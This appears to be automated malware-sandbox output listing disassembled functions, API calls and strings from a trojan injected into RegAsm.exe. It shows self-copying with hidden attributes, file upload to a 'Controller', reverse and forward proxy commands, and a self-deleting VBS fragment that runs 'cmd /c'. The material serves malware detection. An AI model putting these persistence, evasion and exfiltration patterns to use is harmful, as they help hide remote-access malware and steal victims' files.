Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID: X8_
API String ID: 1464849758-1906660996
Opcode ID: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
Instruction ID: 8bf2c607ebde511f1b434109d64c34b6cdbb8d28cf40a594a9c763835df0f646
Opcode Fuzzy Hash: e59a5d4720be3735c3583ecc21b3002b3d05f929497f546d3460778b80b6eaf5
Instruction Fuzzy Hash: 9DD13771D003006FFB24AF759D42A6B77A8EF01354F16417FE905A7382EA3D990A8B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD47 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CD55
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CD6E
CopyFileW.KERNEL32 ref: 0040CE1E
_wcslen.LIBCMT ref: 0040CE34
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CEBC
CopyFileW.KERNEL32 ref: 0040CED2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF11
_wcslen.LIBCMT ref: 0040CF14
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CF2B
CloseHandle.KERNEL32 ref: 0040CF7B
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040CF99
ExitProcess.KERNEL32 ref: 0040CFB0

Strings

6, xrefs: 0040CE28
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040CDDF, 0040CDE4, 0040CE17, 0040CECC, 0040CED1, 0040CED8, 0040CF39
del, xrefs: 0040CF43
open, xrefs: 0040CF92

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$del$open
API String ID: 1579085052-545640883
Opcode ID: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
Instruction ID: 4aa6f52345204f9d3ba8f621bb5a02f3c2425994bcf3c33b54a52c403d9a3db8
Opcode Fuzzy Hash: d7e0deb7c1df92f36f4db919fc40f4064fea54d51c41b90f377997a553d1487b
Instruction Fuzzy Hash: BB51E560208301ABD609B726DC92E7F679D9F84719F10443FF609A62E3EF7C9D04866E

Uniqueness

Uniqueness Score: -1.00%

Function 0041BF69 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041BF84
_memcmp.LIBVCRUNTIME ref: 0041BF9C
lstrlenW.KERNEL32(?), ref: 0041BFB5
FindFirstVolumeW.KERNEL32 ref: 0041BFF0
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C003
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C047
lstrcmpW.KERNEL32(?,?), ref: 0041C062
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C07A
_wcslen.LIBCMT ref: 0041C089
FindVolumeClose.KERNEL32 ref: 0041C0A9
GetLastError.KERNEL32 ref: 0041C0C1
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C0EE
lstrcatW.KERNEL32 ref: 0041C107
lstrcpyW.KERNEL32(?,?), ref: 0041C116
GetLastError.KERNEL32 ref: 0041C11E

Strings

?, xrefs: 0041C01B

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
Instruction ID: ebba18ca6bfbe9900a9076ea91f3c8992c365883813dc3c2e4c5b1ddc1dd106d
Opcode Fuzzy Hash: 715a33eef8a2faa7816bc5fce87db8e969b2932189cd6cfa065d3aae50eb1d12
Instruction Fuzzy Hash: 7B416171544306EBD720DFA0DC88ADB7BECAF48355F10092BF545C2261EB78C988CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00412A02 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412A1B

Part of subcall function 0041B8C6: GetCurrentProcessId.KERNEL32(00000000,65921986,00000000,?,?,?,?,00466468,0040D15B,.vbs,?,?,?,?,?,004752F0), ref: 0041B8ED

Part of subcall function 004184B6: CloseHandle.KERNEL32(004040F5), ref: 004184CC
Part of subcall function 004184B6: CloseHandle.KERNEL32(t^F), ref: 004184D5

Sleep.KERNEL32(0000000A,00465E74), ref: 00412B6D
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412C0F
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412CB1
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D13
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D4A
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412D86
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412DA0
Sleep.KERNEL32(00000064), ref: 00412DE2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0TG, xrefs: 00412F74
/stext ", xrefs: 00412AF8, 00412B9A, 00412C3C
NG, xrefs: 00412EBA
0TG, xrefs: 0041309A
NG, xrefs: 0041300F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: 53e3ede7ba78a191915c14147000c2b2fb712e0a49bf166438579e68d1c7739a
Instruction ID: a1c1eebc7225e2a3af2bf9f674dd4b331a6a22bbf8d2d11b3d3d95dca56a63f0
Opcode Fuzzy Hash: 53e3ede7ba78a191915c14147000c2b2fb712e0a49bf166438579e68d1c7739a
Instruction Fuzzy Hash: E70256315083415AC325FB22D891AEFB3E5AFD4348F50483EF58A931E2EF78598DC64A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C5DD Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C5FF
RegEnumKeyExA.ADVAPI32 ref: 0041C643
RegCloseKey.ADVAPI32(?), ref: 0041C90D

Strings

Publisher, xrefs: 0041C69F
UninstallString, xrefs: 0041C6F2
DisplayVersion, xrefs: 0041C6B6
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C5F5
InstallLocation, xrefs: 0041C6CA
DisplayName, xrefs: 0041C68A
InstallDate, xrefs: 0041C6DE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
Instruction ID: b4b41d76fea16dc8d6548a96d897c20ecb83427c766ff7297069692ec6cda10a
Opcode Fuzzy Hash: 253e9a839a2d3a9543dcebbd2a5c8e5dff626512c864a7405e8cfc213360fc2c
Instruction Fuzzy Hash: 838154311082459BC325EF11D851EEFB7E8BF94309F10482FB589921A1FF34AA49CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4DD Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D528
GetCursorPos.USER32(?), ref: 0041D537
SetForegroundWindow.USER32(?), ref: 0041D540
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D55A
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D5AB
ExitProcess.KERNEL32 ref: 0041D5B3
CreatePopupMenu.USER32 ref: 0041D5B9
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D5CE

Strings

Close, xrefs: 0041D5BF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: e2a929e8b8d8ae91c23b191118bc4d50e56676cab0c381e7b4c0254b0064898e
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: D22119B1544209FFDB094F64ED0EAAA3F76FB08306F004125F506951B2DB75DEA1EB29

Uniqueness

Uniqueness Score: -1.00%

Function 00445C96 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445D06
_free.LIBCMT ref: 00445D1C
_free.LIBCMT ref: 00445D2D
_free.LIBCMT ref: 00445D3E
_free.LIBCMT ref: 00445D55
GetCPInfo.KERNEL32(?,?), ref: 00445D9D

Part of subcall function 00452DB5: _free.LIBCMT ref: 00452E20

_free.LIBCMT ref: 00445F49
_free.LIBCMT ref: 00445F5C
_free.LIBCMT ref: 00445F6A
_free.LIBCMT ref: 00445F75
_free.LIBCMT ref: 00445FB7
_free.LIBCMT ref: 00445FBF
_free.LIBCMT ref: 00445FC7
_free.LIBCMT ref: 00445FCF
_free.LIBCMT ref: 00445FDD

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a5b7fe15a9b19b5435c6d58f6cc927fcc5d11bc1c123ad5776c6a486e1f44b0b
Instruction ID: 35b30c28121b6b0c9a6e456b1157ba059d574d411cc2403bfcf1dfeedd9c98fb
Opcode Fuzzy Hash: a5b7fe15a9b19b5435c6d58f6cc927fcc5d11bc1c123ad5776c6a486e1f44b0b
Instruction Fuzzy Hash: ECB1CE71900605AFEF10DF69C881BEEBBB5BF08304F24402EF994A7342DB799945CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

ReadFile error, xrefs: 00408FC8
Uploading file to Controller: , xrefs: 00408DD5
SetFilePointerEx error, xrefs: 00408FD4
NG, xrefs: 00408C17

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: d3fe49d5c574f570e67a06c04bca4ab2738764bf27c6438758baf9409738e383
Instruction ID: 9a9de3c1f97d4aeb1c15f1b9dcb3f5412df516a05423aabf9feb9beab6c98786
Opcode Fuzzy Hash: d3fe49d5c574f570e67a06c04bca4ab2738764bf27c6438758baf9409738e383
Instruction Fuzzy Hash: 88B192316083409BC314FB26C992AAFB7E5AFC4354F40492FF589622D1EF789945CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 00451207 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045124B

Part of subcall function 00450443: _free.LIBCMT ref: 00450460
Part of subcall function 00450443: _free.LIBCMT ref: 00450472
Part of subcall function 00450443: _free.LIBCMT ref: 00450484
Part of subcall function 00450443: _free.LIBCMT ref: 00450496
Part of subcall function 00450443: _free.LIBCMT ref: 004504A8
Part of subcall function 00450443: _free.LIBCMT ref: 004504BA
Part of subcall function 00450443: _free.LIBCMT ref: 004504CC
Part of subcall function 00450443: _free.LIBCMT ref: 004504DE
Part of subcall function 00450443: _free.LIBCMT ref: 004504F0
Part of subcall function 00450443: _free.LIBCMT ref: 00450502
Part of subcall function 00450443: _free.LIBCMT ref: 00450514
Part of subcall function 00450443: _free.LIBCMT ref: 00450526
Part of subcall function 00450443: _free.LIBCMT ref: 00450538

_free.LIBCMT ref: 00451240

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00451262
_free.LIBCMT ref: 00451277
_free.LIBCMT ref: 00451282
_free.LIBCMT ref: 004512A4
_free.LIBCMT ref: 004512B7
_free.LIBCMT ref: 004512C5
_free.LIBCMT ref: 004512D0
_free.LIBCMT ref: 00451308
_free.LIBCMT ref: 0045130F
_free.LIBCMT ref: 0045132C
_free.LIBCMT ref: 00451344

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
Instruction ID: c063d82046dfb7db7ea77a1ca71dc0387125a27f9d9c771daae3e06cc2a2942d
Opcode Fuzzy Hash: 2f1d87d0e257826117984e37254ff410fc3e82beb909631ef58ecd84ed80cd16
Instruction Fuzzy Hash: DC315E31504301AEEB20AA7AD856B5773E8AF01315F26856FFC48D7262DF38AC44CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00419F02 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419F07
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419F39
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00419FC5
Sleep.KERNEL32(000003E8), ref: 0041A04B
GetLocalTime.KERNEL32(?), ref: 0041A053
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A142

Strings

PG, xrefs: 0041A0FB
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419FED
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00419FE8, 0041A009, 0041A077
PG, xrefs: 0041A017
PG, xrefs: 00419F64

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
Instruction ID: 53b10142388d6e618379421ea863975f0427ee42951a241e26dd10475b989a70
Opcode Fuzzy Hash: a8da52c30f34f733819d3fb30956e5b9677740672e8e7ea6aee02b6146ebfe0e
Instruction Fuzzy Hash: 75517D70A00215AACB14BBB5C8569FD7B69AF44308F40403FF509AB1E2EF7C9D85C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040D74D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 0041279E: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
Part of subcall function 0041279E: WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

Part of subcall function 00413646: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413662
Part of subcall function 00413646: RegQueryValueExA.KERNEL32 ref: 0041367B
Part of subcall function 00413646: RegCloseKey.KERNEL32(00000000), ref: 00413686

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D7A7
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D906
ExitProcess.KERNEL32 ref: 0040D912

Strings

""", 0, xrefs: 0040D82F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D847
Temp, xrefs: 0040D7E8
8SG, xrefs: 0040D75D
open, xrefs: 0040D900
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D8B5
exepath, xrefs: 0040D77F
.vbs, xrefs: 0040D7AD

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 7f923b30726185cbfccfd8198717a34187a5150c2b83f1a17792aadea2110fe2
Instruction ID: c4a317b5347046847bfe7fc55b5e2b024c4a0365841bea6b80e5cdcb83cecef3
Opcode Fuzzy Hash: 7f923b30726185cbfccfd8198717a34187a5150c2b83f1a17792aadea2110fe2
Instruction Fuzzy Hash: 374129719001196ACB15FA62DC56DEEB778AF50709F10007FB106B31E2FF785E8ACA98

Uniqueness

Uniqueness Score: -1.00%

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
CloseHandle.KERNEL32(?), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
Instruction ID: 36cd0b6e7e722fc311c13f4f3d89471b6fda53dcd65266afdd9727349a39dcbc
Opcode Fuzzy Hash: ea79b75f1ae65c935e1138fe974f2fff21a9703030cabbfa4cd42eb945bff9c9
Instruction Fuzzy Hash: F821EA71104B04AFDB316B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB75B851DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00455B1C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004557EA: CreateFileW.KERNEL32(00000000,00000000,?,00455BC5,?,?,00000000), ref: 00455807

GetLastError.KERNEL32 ref: 00455C30
__dosmaperr.LIBCMT ref: 00455C37
GetFileType.KERNEL32 ref: 00455C43
GetLastError.KERNEL32 ref: 00455C4D
__dosmaperr.LIBCMT ref: 00455C56
CloseHandle.KERNEL32(00000000), ref: 00455C76
CloseHandle.KERNEL32(?), ref: 00455DC0
GetLastError.KERNEL32 ref: 00455DF2
__dosmaperr.LIBCMT ref: 00455DF9

Strings

H, xrefs: 00455D7E

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
Instruction ID: 56c3c6f7ff717df319bbbb51fb2fc9f7fa86c8cd8c14b94b2a1c43a0bf66d1dd
Opcode Fuzzy Hash: 399b877e36de6a5c117d04748259f3f5ee8ff48d0ba2fa8d85c55bfe295cd247
Instruction Fuzzy Hash: B4A14632A106049FDF19AF68DC617BE7BA0EB06325F14015EEC11EB392D7399C16CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00450966 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D5
_free.LIBCMT ref: 004509E3
_free.LIBCMT ref: 00450B11
_free.LIBCMT ref: 00450B1C

Strings

\&G, xrefs: 00450B5D
`&G, xrefs: 00450B75
\&G, xrefs: 00450B65

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 852f462f000161ba9b9959a0d0f465cb52e0a9b8631113175a36110267b15b18
Instruction ID: 997e24f70132231b6ca759a19b47624983911e3be9dffde99cd9162d123c0bc6
Opcode Fuzzy Hash: 852f462f000161ba9b9959a0d0f465cb52e0a9b8631113175a36110267b15b18
Instruction Fuzzy Hash: 7C610375900205AFDB20CFA9C842BAABBF4EF09315F24416BED44EB342D774AD45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414AFE Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414BAE, 00414BB6, 00414BBA
65535, xrefs: 00414B01

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
Instruction ID: 82029065c0b78db9351da75f496251e2fcb37d529d8e3b0a8074ff1270b1487a
Opcode Fuzzy Hash: 5dd592201d8a346242394efb96da626efb11898a272192137d190e0d426a4b06
Instruction Fuzzy Hash: 2D51CD7120A301ABD3209A68C909BBB77A4AFC4750F05052FF88697391F66DDCC196AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043A77A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7D2
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A7DF
__dosmaperr.LIBCMT ref: 0043A7E6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A812
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A81C
__dosmaperr.LIBCMT ref: 0043A823
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A866
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A870
__dosmaperr.LIBCMT ref: 0043A877
_free.LIBCMT ref: 0043A883
_free.LIBCMT ref: 0043A88A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 39a0d242431ef486be92fbed9a0e27cc0c46707c2b1528dab1cd8eddccdffa89
Instruction ID: 7a249d13fa055752909bc64b4bd8998278545b645867af894ce57546f5e9ab17
Opcode Fuzzy Hash: 39a0d242431ef486be92fbed9a0e27cc0c46707c2b1528dab1cd8eddccdffa89
Instruction Fuzzy Hash: 3C31B071804209BBDF15AFA5CC45CAF3B7CEF09364F10012AF950562A1DB39CD61DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00411443 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411462
inet_ntoa.WS2_32(?), ref: 004114FD

Strings

I+, xrefs: 004114F2
StopForward, xrefs: 004115DE
GetDirectListeningPort, xrefs: 00411600
StopReverse, xrefs: 004115EF
NG, xrefs: 00411488
StartReverse, xrefs: 004115CD
StartForward, xrefs: 004115C1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: I+$GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-2189482213
Opcode ID: e3512c6b715a1b103a2a18ac285300df7c9feacd19c34a8d2ea7bcf0d5bccf1c
Instruction ID: eff6fc71ce925c47b380800239c389c467092b4a5c3464dac972748da0f26b71
Opcode Fuzzy Hash: e3512c6b715a1b103a2a18ac285300df7c9feacd19c34a8d2ea7bcf0d5bccf1c
Instruction Fuzzy Hash: 3451B531A042015BC614FB36C91AAAE36A5AB84344F40453FF906A76F1EFBD8D85C7CE

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32 ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32 ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

CloseChat, xrefs: 00405609
DisplayMessage, xrefs: 004055EC
GetMessage, xrefs: 004055F8

Memory Dump Source
